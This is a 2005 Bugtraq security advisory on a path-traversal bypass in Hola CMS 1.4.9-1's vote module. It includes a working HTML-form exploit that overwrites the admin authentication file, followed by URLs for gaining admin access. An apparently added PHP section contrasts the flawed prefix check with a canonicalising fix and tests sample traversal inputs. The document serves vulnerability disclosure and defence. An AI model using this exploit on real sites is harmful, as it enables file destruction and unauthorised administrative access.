Message-ID: <20050315170922.1037.qmail@www.securityfocus.com>
Date: 15 Mar 2005 17:09:22 -0000
From: Virginity Security <advisory05@...fiweb.de>
To: bugtraq@...urityfocus.com
Subject: Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access

- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-002
- - - --------------------------------------------------------------------
             DATE : 2005-03-13 15:11 GMT
             TYPE : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/)
           AUTHOR : Virginity
  ADVISORY NUMBER : 004
- - - --------------------------------------------------------------------


Description:

This is a follow-up to SA-2005-001:
A new patched version, 1.4.9-1, was released in which that issue was marked as solved.
The Vote module (vote_save_results.php) now uses strpos() to check whether
the submitted "vote_filename" variable contains "holaDB/votes" at position 0.

BUT! Since we all know how to change directories by typing ../
we can still manipulate or destroy every file on the whole server (every file
the web server process can write, that is)
by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!!
Below is the updated example of how to destroy the login-authentication file and gain access
to the admin functions!

Really sad that the quick patch (released 3? hours after notification)
doesn't really work.

Author of the Software has been notified.
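The patched check and a hardened replacement, as an added example in PHP (not Hola CMS code): the first function mirrors the strpos() prefix test described above, which a "../" segment walks straight past; the second canonicalises the parent directory of the requested file with realpath() and accepts the name only when that directory is the votes directory or sits below it. The function names, the temporary directory layout and the sample inputs are constructed for this example; "vote_filename" and "holaDB/votes" are the names the advisory uses.

```php
<?php
// Added example (not Hola CMS code): the prefix check the advisory describes
// beside a canonicalising path-confinement check. Function names, the demo
// directory layout and the sample inputs are constructed for this example.

// The check the advisory describes: it only asks whether the submitted string
// starts with the votes directory, so "holaDB/votes/../../x" passes.
function prefix_check_as_patched(string $voteFilename): bool
{
    return strpos($voteFilename, 'holaDB/votes') === 0;
}

// Hardened replacement: return the absolute path to write to, or null if the
// submitted name resolves to anything outside $allowedDir. The vote file may
// not exist yet, so the *parent directory* is canonicalised with realpath()
// (which also follows symlinks) and compared with the canonical allowed dir.
function confine_to_dir(string $allowedDir, string $submitted): ?string
{
    // NUL bytes truncate paths in the underlying C calls; refuse them outright.
    if ($submitted === '' || strpos($submitted, "\0") !== false) {
        return null;
    }
    $base = realpath($allowedDir);
    if ($base === false) {
        return null;
    }
    $name = basename($submitted);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    $parent = realpath(dirname($submitted));
    if ($parent === false) {
        return null;   // parent directory does not exist: refuse rather than guess
    }
    // Accept only $base itself or a directory strictly below it.
    if ($parent !== $base && strpos($parent, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $parent . DIRECTORY_SEPARATOR . $name;
}

// --- demo with a constructed directory layout under the system temp dir ---
$webRoot = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'hola_demo_' . getmypid();
mkdir($webRoot . '/holaDB/votes', 0700, true);
mkdir($webRoot . '/admin/multiuser', 0700, true);
$votesDir = $webRoot . '/holaDB/votes';

$samples = [
    'holaDB/votes/poll1.txt',                             // legitimate vote file
    'holaDB/votes/./poll1.txt',                           // dot segment resolves inside: accepted
    'holaDB/votes/../../admin/multiuser/multiuser.php',   // traversal from the advisory
    'holaDB/votes/../../../etc/passwd',                   // escapes the web root entirely
];

foreach ($samples as $s) {
    $weak = prefix_check_as_patched($s) ? 'accept' : 'reject';
    $safe = confine_to_dir($votesDir, $webRoot . '/' . $s) ?? 'reject';
    printf("%-52s prefix-check=%-6s confined=%s\n", $s, $weak, $safe);
}

// tidy up the constructed layout
rmdir($webRoot . '/admin/multiuser');
rmdir($webRoot . '/admin');
rmdir($votesDir);
rmdir($webRoot . '/holaDB');
rmdir($webRoot);
```

Run it with the php CLI: the two legitimate names come back as absolute paths inside the votes directory, while the traversal input from the advisory passes the prefix check but is rejected by the confined version because its canonical parent is the admin directory.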

- - - --------------------------------------------------------------------


Example:

Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button, the first lines of multiuser.php (which
includes the authentication mechanism) get overwritten. By calling
http://[target]/admin/index_cms.php
you have access to all user functions, and by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!


- - - --------------------------------------------------------------------


Solution:

Use another CMS... I think PHP-Nuke isn't that vulnerable ;)

- - - --------------------------------------------------------------------


Personal note:

YES! The girl did it again :)
Contact me on IRC!

- - - --------------------------------------------------------------------

